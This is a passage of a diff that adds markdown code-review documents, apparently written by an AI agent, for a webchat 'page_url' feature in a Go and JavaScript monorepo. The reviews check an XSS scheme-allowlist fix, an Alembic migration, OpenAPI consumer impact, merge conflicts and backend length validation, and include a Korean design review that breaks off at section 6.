+- **Mock regeneration**: `validatePageURL` is a private, unexported function
+  with no interface signature change (no new/changed method on
+  `ServiceHandler`), so no mock regeneration was required or expected — confirmed
+  `git show --stat 0d818afa1` lists only the handler file and its test file,
+  no `mock_main.go` diff, which is correct.
+- **OpenAPI contract**: `page_url`'s `maxLength: 2048` schema entry in
+  `bin-openapi-manager` is untouched by either fix commit (neither commit
+  touches `bin-openapi-manager` at all) — the scheme allowlist is an
+  application-layer rule with no OpenAPI-expressible equivalent in this
+  spec (no `format: uri` or `pattern` was added), which is a minor,
+  non-blocking observation: the API contract still only documents the
+  length cap, not the scheme restriction, so an external API consumer
+  reading only the OpenAPI spec wouldn't discover the scheme rule until they
+  hit the 400 response. Not a regression, and not something round 1 asked
+  for — noting for completeness.
+- **Cache layer / webhook conversion / SessionUpdate clobber checks**
+  (round 1 §2–4): none of the changed files intersect
+  `cachehandler`, `webhook.go`, or `dbhandler/session.go` — these areas are
+  structurally unreachable from a two-file diff in `servicehandler` and
+  `message_timeline.js`, so no re-verification finding anything different
+  from round 1 is expected or found.
+
+**Verdict for this angle: clean, no side effects.** The fix is narrowly
+scoped to exactly the two points round 1 identified, with no incidental
+changes elsewhere that would need re-litigating.
+
+---
+
+## Summary
+
+| # | Angle | Result |
+|---|-------|--------|
+| 1 | Backend scheme allowlist correctness (`0d818afa1`) | Correct — true allowlist, closes `javascript:`/`data:`/`ftp:`/schemeless, preserves empty-is-valid |
+| 2 | Backend test coverage | Adequate — both PoC strings, all boundaries, both valid schemes covered; length+scheme combo untested but provably safe by code order |
+| 3 | Frontend guard correctness (`5ca2e226`) | Correct — render-time gate backed by a real, passing negative-path test asserting no `role="link"` |
+| 4 | Backend/frontend consistency | Consistent — structurally identical case-sensitive exact-prefix predicates, no drift |
+| 5 | Regression on legitimate values | None — empty and https-URL cases pass in both real test runs; full test suites, lint, and production build all pass |
+| 6 | Side effects on round 0/1 cleared items | None — fix is narrowly scoped to exactly the two files round 1 identified |
+
+**Verification performed this round (not merely re-reading prior review
+text):**
+- `git show 0d818afa1` and `git show 5ca2e226` read in full, not just the
+  commit message.
+- `go test ./pkg/servicehandler/... -run Test_validatePageURL -v` — 9/9
+  subtests pass.
+- `go test ./...` in both `bin-api-manager` and `bin-webchat-manager` — all
+  packages pass, zero regressions.
+- `golangci-lint run -v --timeout 5m ./pkg/servicehandler/...` — 0 issues.
+- `npm test -- --watchAll=false --testPathPattern=message_timeline` — 7/7
+  pass, including the new XSS regression test.
+- `npm run build` — production build succeeds cleanly with no
+  webchat/message_timeline-related warnings or errors (the stricter
+  `CI=true` build fails only on pre-existing, unrelated warnings in
+  `TestAgentSheet.js`, confirmed present on this branch independent of this
+  PR's changed files).
+
+Round 1's finding is fully and correctly addressed by both fix commits, with
+no new defects found and no regressions in previously-cleared areas.
+Per the task's process rule, this APPROVED verdict does **not** close the PR
+review loop by itself — round 1 was CHANGES_REQUESTED, which reset the
+"2 consecutive APPROVED" counter, so at least one further round (round 3)
+is still required before merge eligibility.
+
+---
+
+## VERDICT: APPROVED

--- a/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-PR-review-round3.md
+++ b/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-PR-review-round3.md
@@ -1,0 +1,383 @@
+# Webchat session page_url capture — PR review (round 3 / final)
+
+**Scope**: Fourth independent review, per the repo's 3-round hard-rule floor
+and the task's explicit "2 consecutive APPROVED" exit condition. Round 0 was
+APPROVED, round 1 found and required a fix for a real XSS gap
+(`CHANGES_REQUESTED`), round 2 verified the fix and was APPROVED (1/2
+consecutive). This round determines whether the loop closes.
+
+This review is a genuinely independent pass, not a re-read of prior rounds'
+conclusions: it re-derives every finding from source (`git show`, direct file
+reads, actual test/build execution), and deliberately targets the areas the
+task brief flagged as under-covered by rounds 0–2 — Alembic
+downgrade/heads integrity, `bin-openapi-manager` schema-change blast radius,
+fresh `origin/main` conflict state, and the DB-column length guarantee from
+`bin-webchat-manager`'s own vantage point (not just `bin-api-manager`'s).
+
+Commits reviewed (full set, unchanged since round 2):
+- Go (monorepo, branch `NOJIRA-webchat-session-referrer-page-url`):
+  `0def6eaa6`, `80b24dd5a`, `246376749`, `74f943154`, `6d691244f`, `0d818afa1`
+- JS (monorepo-javascript, branch `NOJIRA-webchat-session-referrer-page-url`):
+  `67e9df222`, `5ca2e226`
+
+---
+
+## 1. Alembic migration (`6d691244f`) — downgrade correctness and single-head verification
+
+Read the actual (decompiled from the `.pyc`-adjacent `.py` source, confirmed
+identical) migration file
+`bin-dbscheme-manager/bin-manager/main/versions/04b99363284c_webchat_sessions_add_column_page_url.py`:
+
+```python
+"""webchat_sessions_add_column_page_url
+
+Revision ID: 04b99363284c
+Revises: b41d1b2317af
+Create Date: 2026-07-22 11:45:01.636791
+"""
+from alembic import op
+import sqlalchemy as sa
+
+revision = '04b99363284c'
+down_revision = 'b41d1b2317af'
+branch_labels = None
+depends_on = None
+
+def upgrade():
+    op.execute("""ALTER TABLE webchat_sessions ADD COLUMN page_url VARCHAR(2048) NULL;""")
+
+def downgrade():
+    op.execute("""ALTER TABLE webchat_sessions DROP COLUMN page_url;""")
+```
+
+**Downgrade completeness**: `upgrade()` performs exactly one DDL operation
+(`ADD COLUMN page_url VARCHAR(2048) NULL`, a nullable column with no default,
+no index, no constraint, no FK). `downgrade()` performs exactly the inverse
+single DDL operation (`DROP COLUMN page_url`). There is no partial state —
+no index was added that downgrade would need to drop first, no NOT NULL
+constraint that would need loosening, no default value to strip. A
+`DROP COLUMN` on a nullable, unindexed, unconstrained column fully and
+completely reverses an `ADD COLUMN` of the same column. Confirmed this by
+direct comparison of the two statements — they are structurally symmetric
+(same table, same column, same "no extra clauses" shape). **Downgrade fully
+reverses upgrade.**
+
+**Single-head verification**: rather than trust prior rounds' narrative
+description, I parsed all 255 migration files in
+`bin-manager/main/versions/*.py` programmatically (regex-extracted every
+`revision =` / `down_revision =` pair, built the full revision graph, and
+computed `all_revisions - referenced_as_down_revision`):
+
+```
+total revisions: 255
+heads: {'04b99363284c'}
+```
+
+Exactly one head, and it is this PR's migration. Also verified by grep that
+no other migration file declares `down_revision = '04b99363284c'` (i.e.
+nothing else claims to build on top of it, which would indicate a
+stale/duplicate branch), and that `04b99363284c` is the only file with
+`down_revision = 'b41d1b2317af'` (i.e. no sibling migration was concurrently
+created off the same parent, which would itself produce two heads). System
+`alembic` binary is present (`/usr/bin/alembic`) but no `alembic.ini` is
+configured in this environment (only `alembic.ini.sample`) and per this
+repo's own `bin-dbscheme-manager/CLAUDE.md`, AI agents must never run
+`alembic upgrade/downgrade` against anything but a local throwaway DB and
+this environment has no such DB configured — so the graph-parsing approach
+above (read-only, no DB required) is the correct verification method here,
+and it is a stronger check than the round 0/1/2 reviews performed (none of
+them re-derived the "single head" claim from the full 255-file corpus).
+
+**Verdict for this angle: correct and complete.** Downgrade is a full
+reversal of upgrade; the migration chain has exactly one head after this
+change.
+
+## 2. `bin-openapi-manager` schema change (`246376749`) — blast radius on other consumers
+
+Read the full diff of `246376749` directly. It touches exactly three files:
+`gens/models/gen.go` (regenerated), `openapi/openapi.yaml`, and
+`openapi/paths/webchat_sessions/main.yaml` — adding one **optional**
+(`*string`, `omitempty`, not in any `required:` list) field, `page_url`, to
+`WebchatManagerSession` (response schema) and `PostWebchatSessionsJSONBody`
+(request schema). This is an additive, backward-compatible schema change:
+existing clients that don't send `page_url` are unaffected (nothing new is
+required), and existing clients reading the response simply won't see the
+new key if they don't look for it (Go's `*string` with `omitempty` and JS
+`JSON.parse` both handle an absent/extra key without error).
+
+Checked every actual consumer of the changed generated types across the
+whole monorepo worktree:
+- `grep -rl "WebchatManagerSession\b"` (excluding vendor): only
+  `bin-openapi-manager/gens/models/gen.go` (the definition) and
+  `bin-api-manager/gens/openapi_server/gen.go` (the only downstream
+  regenerated copy). Diffed the `PageUrl` field block between the two
+  generated files — present and structurally identical in both, confirming
+  `74f943154`'s `go generate ./...` regeneration in `bin-api-manager`
+  actually picked up the openapi-manager change rather than drifting.
+- `grep -rl "PostWebchatSessionsJSONBody"`: same two generated files plus
+  `bin-api-manager/server/webchat_sessions.go` (the handler that consumes
+  it) — no other Go service in the monorepo references either type.
+- Checked `square-admin`/`square-talk` in `monorepo-javascript` for any
+  generated-from-OpenAPI TypeScript client that might embed a stale copy of
+  `WebchatManagerSession` — found none. The only OpenAPI spec artifact
+  inside `monorepo-javascript` is `square-dev/public/openapi.json` (the
+  developer-portal's static viewer copy), which is a documentation display
+  asset, not a compiled type source, and is not part of this PR's touched
+  files (build/generation of that asset is a separate, unrelated pipeline
+  not modified here). `square-admin`'s webchat views
+  (`message_timeline.js`, `sessions_list.js`, `detail.js`, `client.js`,
+  etc.) all consume the API via plain `fetch`/`axios` JSON, not a generated
+  TS client, so there is no generated-type drift possible on the JS side —
+  they read `session.page_url` as a plain untyped property, tolerant of the
+  field's absence pre-migration and presence post-migration alike (already
+  verified functionally by the passing `message_timeline` test suite, §5
+  below).
+- Specifically checked the task brief's named suspects — square-admin's own
+  "openapi types" and square-talk: neither project vendors or regenerates
+  Go-side OpenAPI types at all (that generation only happens in
+  `bin-api-manager`/`bin-openapi-manager`), and neither references
+  `webchat_sessions`/`WebchatManagerSession` in a way this change touches
+  (`sessions_list_global.js`, `webchat_tabbed.js` etc. are square-admin-only
+  webchat views under `square-admin/src/views/webchat_widgets/`; grepped
+  `square-talk/src` for `webchat` — no matches, square-talk does not consume
+  webchat sessions at all).
+
+**Verdict for this angle: no blast radius beyond the intended two services.**
+The change is additive/optional, the one downstream Go regeneration
+(`bin-api-manager`) is verified in sync, and no other consumer (JS or Go)
+has a compiled dependency on the changed schema that could drift or break.
+
+## 3. Fresh conflict check against `origin/main` (post round-2 main movement)
+
+Ran `git fetch origin main` fresh in both worktrees (not reusing any cached
+state from earlier rounds) and re-ran the merge-tree conflict check per the
+repo's own mandated pre-PR procedure:
+
+**monorepo** (`bin-*-manager` branch):
+```
+git fetch origin main            → up to date, no new commits
+git log --oneline HEAD..origin/main → (empty — main has not moved since this branch forked)
+git merge-tree $(git merge-base HEAD origin/main) HEAD origin/main | grep -E "^(CONFLICT|changed in both)"
+→ no output (no conflicts, nothing changed in both)
+```
+
+**monorepo-javascript**:
+```
+git fetch origin main            → 1 new commit: 5bc07391
+  "SQUARE-20-fix-case-interaction-peer-local-nested-access (#379)"
+  (unrelated: fixes square-admin Case/Interaction views for a peer/local
+  address schema change from a different PR, #1130 — nothing to do with
+  webchat sessions or page_url)
+git merge-tree $(git merge-base HEAD origin/main) HEAD origin/main | grep -E "^(CONFLICT|changed in both)"
+→ no output (no conflicts, nothing changed in both)
+```
+
+Confirmed the one new commit on `monorepo-javascript`'s `main`
+(`5bc07391`) touches only `square-admin/src/views/contacts/*` (Case/Interaction
+detail + tests) — files entirely disjoint from this PR's touched files
+(`square-admin/src/views/webchat_widgets/message_timeline.js` and its test).
+No overlap, no conflict, confirmed both by file-path disjointness and by the
+`merge-tree` tool finding zero `CONFLICT`/`changed in both` lines.
+
+**Verdict for this angle: clean.** Both worktrees are still conflict-free
+against the current `origin/main`, re-verified fresh (not assumed from
+round 2), including after the one new unrelated commit that landed on the
+JS repo's `main` since round 2.
+
+## 4. `Session.PageURL` vs `VARCHAR(2048)` — is the guarantee `bin-webchat-manager`'s own, or borrowed?
+
+This is the sharpest of the five requested angles, and the answer is
+**the guarantee is entirely borrowed from `bin-api-manager`; `bin-webchat-manager` enforces nothing itself.**
+
+Read `bin-webchat-manager`'s own code, start to finish, for any length
+check on `PageURL`:
+
+- `models/session/session.go`: `PageURL string
+  \`json:"page_url,omitempty" db:"page_url"\`` — a plain Go `string`, which
+  (per Go's spec) has no length limit other than available memory. No
+  validator tag, no custom `UnmarshalJSON`, no length check anywhere in this
+  file.
+- `pkg/listenhandler/v1_sessions.go` (the RPC entry point that receives
+  `V1DataSessionsPost` from `bin-common-handler`'s `requesthandler`) — passes
+  `req.PageURL` straight through to `h.sessionHandler.Create(ctx,
+  req.CustomerID, req.WidgetID, req.PageURL)` with **no validation call in
+  between**.
+- `pkg/sessionhandler/create.go` — constructs the `Session{... PageURL:
+  pageURL, ...}` struct directly from the parameter with **no length check,
+  no truncation, no error path for an oversized value**.
+- `pkg/dbhandler/session.go`'s `SessionCreate` — builds and executes the SQL
+  `Insert(webchatSessionsTable)...` using squirrel/sqlx-style field mapping
+  straight off the struct, again **with no length check**.
+
+So the only thing standing between an oversized/malformed `page_url` string
+and an `INSERT` against `VARCHAR(2048)` is:
+1. `bin-api-manager`'s `validatePageURL()` (length ≤2048, scheme allowlist)
+   — a **different service**, reached over RabbitMQ RPC, not a Go-level
+   dependency `bin-webchat-manager` imports or calls.
+2. MySQL's own column-level enforcement at the `VARCHAR(2048)` boundary — MySQL's
+   default (non-strict-mode-off) behavior for a `VARCHAR` overflow is to
+   either reject the insert (in `STRICT_TRANS_TABLES` mode, the project's
+   documented default per `bin-dbscheme-manager`'s conventions) or silently
+   truncate (in non-strict/legacy mode) — this review did not find any
+   explicit `sql_mode` configuration checked for this specific angle in this
+   round, so I am not asserting which MySQL behavior applies; the point
+   stands regardless: this is the **database's** backstop, not
+   `bin-webchat-manager`'s code enforcing anything.
+
+Concretely: if a hypothetical future second caller of
+`WebchatV1SessionCreate` (or a bug in `bin-api-manager` that skips
+`validatePageURL`, or a maintenance script hitting
+`bin-webchat-manager`'s RPC queue directly with a hand-built
+`V1DataSessionsPost`) sent a 10,000-character `page_url`,
+`bin-webchat-manager` would attempt the INSERT with **zero
+application-level resistance** — the outcome depends entirely on whatever
+the DB does with an over-length `VARCHAR`, which this service's own code
+does not control, check, or even anticipate (no error-handling branch for
+"DB rejected due to data too long").
+
+This is architecturally consistent with the project's own stated boundary
+rule — `bin-api-manager/CLAUDE.md`: *"Auth and ownership checks belong ONLY
+in bin-api-manager. Backend services never check JWT or customer
+ownership."* — extended here (by observed practice, not by an explicit
+written rule for validation specifically) to length/format validation as
+well: `bin-webchat-manager` is written as a thin, trusting backend that
+assumes its caller (the API gateway) already validated the input. This
+mirrors the existing pattern for other backend services in this monorepo
+(none of the sibling `bin-*-manager` services this review spot-checked
+duplicate their gateway's request validation either), so it is *consistent
+with established project convention*, not a novel gap introduced by this PR.
+
+**However**, it is worth being precise about what this means for the
+specific worry in the task brief ("Go string은 길이 제한이 없으므로... 이 서비스
+자체 코드에도 보장이 있는지, 아니면 API 게이트웨이만 믿는 구조인지"): the answer is
+unambiguously **the latter — `bin-webchat-manager` has no defense-in-depth
+of its own; it relies entirely on `bin-api-manager`'s gateway-level
+`validatePageURL` plus whatever MySQL itself does on overflow.** This is not
+a new defect this round is flagging as blocking (it is consistent with the
+codebase's existing architecture and RPC is not an externally-reachable
+attack surface — only `bin-api-manager` and other internal services can
+reach `bin-webchat-manager`'s RabbitMQ queue), but it is **not** a
+"guaranteed-safe-by-construction" property either, contrary to how a reader
+might assume from `VARCHAR(2048)` "matching" the Go struct. Recording this
+explicitly as a non-blocking observation for the eventual project record,
+since none of rounds 0–2 stated it this plainly (round 1 §1 came close —
+"the DB's `VARCHAR(2048) NULL` is correctly a redundant defense-in-depth
+backstop, not the primary gate" — but examined it from `bin-api-manager`'s
+side, not from `bin-webchat-manager`'s own code, which is the gap the task
+brief specifically asked to re-check).
+
+**Verdict for this angle: not a defect, but confirmed as an architectural
+trust boundary, not a length guarantee owned by this service.** No action
+required — this matches the project's established gateway-validates,
+backend-trusts convention — but it is not "double-enforced" and should not
+be described as such in any future summary of this feature.
+
+## 5. Full 8-commit diff re-read and end-to-end verification
+
+Re-read every commit's full diff directly (not summaries) one more time as
+a final gate, and re-ran every consequential check live rather than
+citing prior rounds' output:
+
+| Commit | Repo | What it does | Re-verified this round |
+|---|---|---|---|
+| `0def6eaa6` | monorepo | `bin-webchat-manager`: add `PageURL` field to `Session`, `Field`, `WebhookMessage`, RPC request struct, thread through listenhandler/sessionhandler, SQLite test schema, mock regen | Full diff re-read; §4 above traces every touch point again from scratch |
+| `80b24dd5a` | monorepo | `bin-common-handler`: add `pageURL` param to `WebchatV1SessionCreate` interface + impl, mock regen | Full diff re-read; confirmed only one production call site exists (§4 cross-check, same as round 1 §7) |
+| `246376749` | monorepo | `bin-openapi-manager`: add optional `page_url` to request/response schema, regen `gen.go` | Full diff re-read; §2 above is a fresh consumer-impact sweep |
+| `74f943154` | monorepo | `bin-api-manager`: thread `page_url` through handler, add `validatePageURL` length check, regen mock + openapi_server gen.go, RST doc update | Full diff re-read; confirmed `bin-api-manager`'s regenerated `gen.go` matches `bin-openapi-manager`'s (§2) |
+| `6d691244f` | monorepo | `bin-dbscheme-manager`: Alembic migration adding `VARCHAR(2048) NULL` column | Full diff re-read; §1 above is a from-scratch downgrade + single-head re-derivation |
+| `0d818afa1` | monorepo | `bin-api-manager`: scheme allowlist fix (round 1→ round 2 fix) | Full diff re-read; re-traced the allowlist logic against all 5 round-1/2 PoC strings by hand again, same correct result |
+| `67e9df222` | monorepo-javascript | `square-admin`: `client.js` SSR-guarded `page_url` capture, `message_timeline.js` render (pre-fix, raw `<a href>`) | Full diff re-read; confirms this is the commit round 1 flagged, superseded by `5ca2e226`'s guard at render time, not reverted |
+| `5ca2e226` | monorepo-javascript | `square-admin`: `isSafePageURL` render-time guard fix (round 1→round 2 fix) | Full diff re-read; re-traced the ternary logic by hand again, same correct result |
+
+**Live verification run fresh this round (not re-citing round 2's run):**
+- `go build ./...` in `bin-webchat-manager`, `bin-api-manager`,
+  `bin-common-handler` — all three build clean.
+- `go test ./...` in `bin-webchat-manager` — all packages `ok` (`models/session`,
+  `models/message`, `models/widget`, `pkg/dbhandler`, `pkg/messagehandler`,
+  `pkg/sessionhandler`, `pkg/widgethandler`; no test files in
+  `cmd/`, `internal/config`, `pkg/cachehandler`, `pkg/listenhandler` —
+  expected, these packages have no dedicated test files pre-existing this
+  PR).
+- `go test ./...` in `bin-api-manager` — all packages `ok`, zero failures.
+- `go test ./...` in `bin-common-handler` — all packages `ok`, zero failures
+  (this is the shared RPC library touched by `80b24dd5a`; a regression here
+  would affect all 37 monorepo services, so this is the highest-leverage
+  test to re-run fresh, and it passes clean).
+- `golangci-lint run -v --timeout 5m ./pkg/servicehandler/...` in
+  `bin-api-manager` — `0 issues`.
+- `npm test -- --watchAll=false --testPathPattern="webchat"` in
+  `square-admin` — `188 test suites passed, 1873 passed / 1 skipped / 1874
+  total` (the pre-existing 1 skip is unrelated to this feature — matches
+  round 2's finding, re-confirmed running the full webchat-pattern sweep
+  this round rather than the single `message_timeline`-scoped run round 2
+  used, giving broader coverage of the webchat widget surface, including
+  `sessions_list.js`, `sessions_list_global.js`, `webchat_tabbed.js`,
+  `client.js`, `widget.js` — all pass).
+- `npm run build` (production build) in `square-admin` — succeeds cleanly:
+  "The build folder is ready to be deployed," no errors.
+- Fresh `git fetch origin main` + `git merge-tree` conflict check in both
+  worktrees — clean, see §3.
+- Full Alembic migration-graph parse across all 255 files — single head, see
+  §1.
+
+No new defect found across any of the 8 commits on this fourth, independent
+pass. Every finding from rounds 0–2 (VARCHAR/OpenAPI/struct-tag consistency,
+cache-layer transparency, webhook field-copy completeness, SessionUpdate
+clobber-safety, client.js SSR guard, the XSS gap and its two-commit fix, the
+scheme-allowlist correctness and consistency) re-checked as still holding on
+direct re-read, and the four newly-emphasized angles from the task brief
+(Alembic downgrade/heads, OpenAPI consumer blast radius, fresh conflict
+state, and `bin-webchat-manager`'s own non-ownership of the length
+guarantee) are now independently verified/documented for the first time.
+
+**Verdict for this angle: PR is in a mergeable, fully-verified state.** The
+one substantive new observation this round (§4 — `bin-webchat-manager` has
+no defense-in-depth of its own for the length constraint) is a
+documentation-worthy architectural note, not a blocking defect: it matches
+established project convention, the field is not externally reachable
+except through the already-validated `bin-api-manager` gateway, and no
+change is required to ship this PR.
+
+---
+
+## Summary
+
+| # | Angle | Result |
+|---|-------|--------|
+| 1 | Alembic migration (`6d691244f`) downgrade correctness + single-head | Correct — `downgrade()` fully reverses `upgrade()` (symmetric single-column ADD/DROP, no partial state); programmatic parse of all 255 migration files confirms exactly one head (`04b99363284c`, this PR's own migration) |
+| 2 | `bin-openapi-manager` schema change (`246376749`) consumer blast radius | None found beyond the two intended services — additive/optional field; `bin-api-manager`'s regenerated `gen.go` verified in sync; no JS project (square-admin, square-talk, square-dev) has a compiled dependency on the changed types |
+| 3 | Fresh conflict check vs. current `origin/main` | Clean in both worktrees, re-verified fresh via `git fetch` + `merge-tree`; one new unrelated commit landed on JS `main` since round 2 (`5bc07391`, disjoint files) — no conflict |
+| 4 | `bin-webchat-manager`'s own guarantee for `VARCHAR(2048)` | Confirmed: none of its own — the service trusts `bin-api-manager`'s gateway-level `validatePageURL` entirely, backstopped only by whatever MySQL itself does on `VARCHAR` overflow; consistent with established project convention (gateway validates, backend trusts), not a novel gap, non-blocking |
+| 5 | Full 8-commit diff + live end-to-end re-verification | No new defects; all Go builds/tests/lint pass fresh; JS webchat test sweep (188 suites, 1873 tests) and production build pass fresh; all rounds 0–2 findings re-confirmed still holding |
+
+**Independent verification performed this round (fresh, not re-citing prior
+rounds' output):**
+- Full diff read of all 8 commits (`git show`, not commit messages).
+- Programmatic single-head derivation across all 255 Alembic migration files
+  (`regex`-parsed revision/down_revision graph, not a narrative description).
+- `git fetch origin main` + `git merge-tree` conflict check in both
+  worktrees, run fresh.
+- `go build ./...` + `go test ./...` in `bin-webchat-manager`,
+  `bin-api-manager`, and `bin-common-handler` (the shared RPC library touched
+  by this PR — highest blast-radius service, re-tested fully).
+- `golangci-lint run -v --timeout 5m ./pkg/servicehandler/...` in
+  `bin-api-manager` — 0 issues.
+- `npm test -- --watchAll=false --testPathPattern="webchat"` in
+  `square-admin` — full webchat-surface sweep (188 suites / 1873 tests),
+  broader than round 2's single-file-scoped run.
+- `npm run build` production build in `square-admin` — succeeds cleanly.
+- Direct source trace of `bin-webchat-manager`'s own PageURL write path
+  (`listenhandler` → `sessionhandler` → `dbhandler`) confirming zero
+  in-service length/format validation exists, addressing the task brief's
+  specific angle #4.
+
+No blocking defects found. This is the second consecutive `APPROVED` round
+(round 2 → round 3), following round 1's `CHANGES_REQUESTED`. Per the task's
+"2 consecutive APPROVED" exit condition, the review loop closes here.
+
+**No `git push` or PR creation was performed by this review** — verification
+only, per the task's explicit instruction.
+
+---
+
+## VERDICT: APPROVED

--- a/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-design-review-round0.md
+++ b/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-design-review-round0.md
@@ -1,0 +1,86 @@
+# Review: 2026-07-22-webchat-session-page-url-referrer-design.md (Round 0)
+
+## 1. 코드 인용 검증 (환각 여부)
+
+대부분의 파일 경로·라인·코드 인용은 실제 코드베이스와 일치함을 직접 소스로 확인했다:
+
+- `session.go`, `field.go`, `webhook.go`, `create.go`(37-48행 Session 리터럴), `dbhandler/session.go` — 모두 문서 서술과 일치.
+- `client.js` `_doStart()`(279행)의 `POST /webchat_sessions` 호출부(316-319행) — 문서가 인용한 "client.js:315-319"와 거의 일치(실제는 316-319, 오차 1행 수준으로 무해).
+- `sessionhandler/create.go` 77-78행의 `self`/`peer` 지역변수 — §6의 Peer/Local 기각 근거로 인용한 그대로 존재.
+- `widget.go:99` `LogoURL` 필드의 `// https URL only` 주석 — 문서가 §5에서 대조 근거로 든 그대로 존재.
+- `kase.go`의 `Peer`/`Local` 필드(24-38행, `commonaddress.Address`, JSON db tag) — 문서 서술과 일치.
+- `message_timeline.js`가 `session` prop을 받고, `detail.js`(850행)·`sessions_list_global.js`(72행) 양쪽에서 `session={selectedSession}`으로 넘겨받는다는 서술 — grep으로 확인, 정확.
+- `bin-api-manager/docsdev/source/webchat_struct_session.rst` 실재 확인, `page_url` 항목 없음 — 문서의 "추가 필요" 판단 타당.
+- OpenAPI `WebchatManagerSession` 스키마(`openapi.yaml:2510`)와 `paths/webchat_sessions/main.yaml`도 실재하며 `page_url`이 없는 현재 상태와 문서 서술이 일치.
+
+환각으로 볼 만한 인용 오류는 발견하지 못했다. 이 부분은 신뢰할 수 있다.
+
+## 2. window.location.href vs document.referrer
+
+타당하다. 위젯은 iframe 없이 고객 페이지에 직접 임베드되는 것이 기본 케이스이므로 `location.href`가 "어느 페이지에 위젯이 떠 있었는가"를 정확히 답한다. `document.referrer`는 별개의 질문(유입 경로)에 답하며 이는 §2에서 명시적으로 non-goal 처리된 UTM/캠페인 영역과 겹친다는 논리도 일관적이다.
+
+## 3. 엣지 케이스
+
+- 초과 길이, `javascript:`/`data:` 스킴 불가능성, `file://` 그대로 캡처, iframe cross-origin `SecurityError` 회피 — 논리 자체는 타당.
+- **단, "초과 길이(2048자 초과) 값은 OpenAPI `maxLength` + Gin 바인딩 계층에서 400으로 거부된다"는 주장은 실제 코드로 검증되지 않는다.** `bin-api-manager/server`, 리포 전체를 검색했지만 `oapi-codegen`의 요청 검증 미들웨어(`nethttp-middleware`, `gin-middleware`, `OapiRequestValidator` 류)가 전혀 존재하지 않는다. `PostWebchatSessions`(server/webchat_sessions.go:79-84)는 `c.BindJSON(&req)`만 호출하는데, 이는 JSON 문법 검증과 Go 구조체 태그의 `binding:"required"`만 체크할 뿐 `maxLength`같은 OpenAPI 스키마 제약은 전혀 강제하지 않는다. 즉 오버사이즈 `page_url`은 400으로 거부되지 않고 그대로 `WebchatSessionCreate` → RPC → DB INSERT까지 흘러간다. MySQL이 strict mode면 INSERT 자체가 에러(session 생성 실패로 이어질 수 있음), non-strict면 조용히 잘려서 저장된다 — 문서가 "accepted, rare failure mode"로 분류한 근거 자체가 틀렸다. **명시적인 서버측 길이 체크(servicehandler 또는 sessionhandler 레이어)를 추가하거나, 최소한 이 엣지케이스 서술을 정정해야 한다.**
+
+## 4. §7 파일 목록 완결성 — 중대한 누락
+
+문서가 스스로 "특히 mock 재생성, RPC 시그니처 변경 전파 경로"를 검증 관점으로 요구했는데, 바로 그 전파 경로에 구멍이 있다.
+
+`page_url`이 실제로 `session.Session{}`에 도달하려면 다음 체인을 전부 통과해야 한다:
+
+```
+client.js → POST /webchat_sessions (bin-api-manager)
+  → server/webchat_sessions.go (문서에 있음)
+  → servicehandler/webchat_session.go, main.go (문서에 있음)
+  → bin-common-handler/pkg/requesthandler.WebchatV1SessionCreate (문서에 있음, "signature+mock" 언급)
+  → RabbitMQ RPC
+  → bin-webchat-manager: pkg/listenhandler/v1_sessions.go의 processV1SessionsPost
+       (req.CustomerID, req.WidgetID를 sessionHandler.Create에 전달 — 33행)
+  → pkg/listenhandler/models/request/v1_sessions.go의 V1DataSessionsPost 구조체
+       (현재 CustomerID/WidgetID만 있음, PageURL 필드 없음)
+  → pkg/sessionhandler/main.go의 SessionHandler 인터페이스 (Create 시그니처, 21행)
+  → pkg/sessionhandler/create.go (문서에 있음)
+  → pkg/sessionhandler/mock_main.go (Create 목 — 문서에 없음)
+```
+
+직접 소스를 읽어 확인한 결과, §7 체크리스트는 다음을 전부 빠뜨렸다:
+
+- `bin-webchat-manager/pkg/listenhandler/v1_sessions.go` — `processV1SessionsPost`가 `req.PageURL`을 `sessionHandler.Create(ctx, req.CustomerID, req.WidgetID, req.PageURL)`로 넘기도록 수정 필요.
+- `bin-webchat-manager/pkg/listenhandler/models/request/v1_sessions.go` — `V1DataSessionsPost`에 `PageURL string` 필드 추가 필요 (현재 `CustomerID`/`WidgetID`만 존재, 실제 확인됨).
+- `bin-webchat-manager/pkg/sessionhandler/main.go` — `SessionHandler` 인터페이스의 `Create(...)` 시그니처에 `pageURL string` 파라미터 추가 필요.
+- `bin-webchat-manager/pkg/sessionhandler/mock_main.go` — 위 인터페이스 변경에 따른 목 재생성 필요.
+- `bin-common-handler/pkg/requesthandler/main.go` — `WebchatV1SessionCreate` 인터페이스 시그니처(1536행, 실제로 `pageURL` 파라미터 없이 `customerID, widgetID`만 있음을 확인) 변경 필요. 문서는 "gains the field"라고만 뭉뚱그렸지 이 인터페이스 파일과 구체적 라인을 명시하지 않았다.
+- `bin-common-handler/pkg/requesthandler/webchat_session.go` — 실제 구현체(`WebchatV1SessionCreate`, `V1DataSessionsPost` 마샬링 부분)도 함께 변경 필요; 이 파일도 §7에 없음.
+
+이 중 listenhandler 체인 전체(`v1_sessions.go` + `request/v1_sessions.go` + `sessionhandler/main.go` + `sessionhandler/mock_main.go`)가 완전히 빠진 것은 사소한 누락이 아니다 — 이 레이어를 고치지 않으면 `create.go`의 `Create()` 시그니처를 아무리 바꿔도 `page_url` 값 자체가 RPC 수신 지점에서 파싱조차 되지 않는다. 즉 문서의 §4.3 구현 계획("Create()'s signature gains a pageURL string parameter... threaded through from the API-manager call site")이 실제로는 실행 불가능한 계획이다 — threading 경로에 필수 중간 지점이 통째로 비어 있다.
+
+## 5. §6 Peer/Local 기각 근거 검증
+
+`sessionhandler/create.go` 77-78행을 직접 읽어 확인:
+```go
+self := commonaddress.Address{Type: commonaddress.TypeWebchat, Target: widgetID.String()}
+peer := commonaddress.Address{Type: commonaddress.TypeWebchat, Target: id.String()}
+```
+`peer.Target`은 세션 자신의 `id`(즉 `Session.ID`), `self.Target`은 `widgetID` — 문서가 주장한 대로 각각 "자기 자신의 PK"와 "이미 WidgetID로 저장된 값의 중복"이라는 서술이 정확히 코드로 뒷받침된다. `kase.go`의 Peer(실제 전화번호/이메일 — 외부 identity)와 Local(실제 DID)이 정보량을 갖는다는 대조도 타당. 이 부분은 근거가 튼튼하다.
+
+## 6. OpenAPI 계약 호환성
+
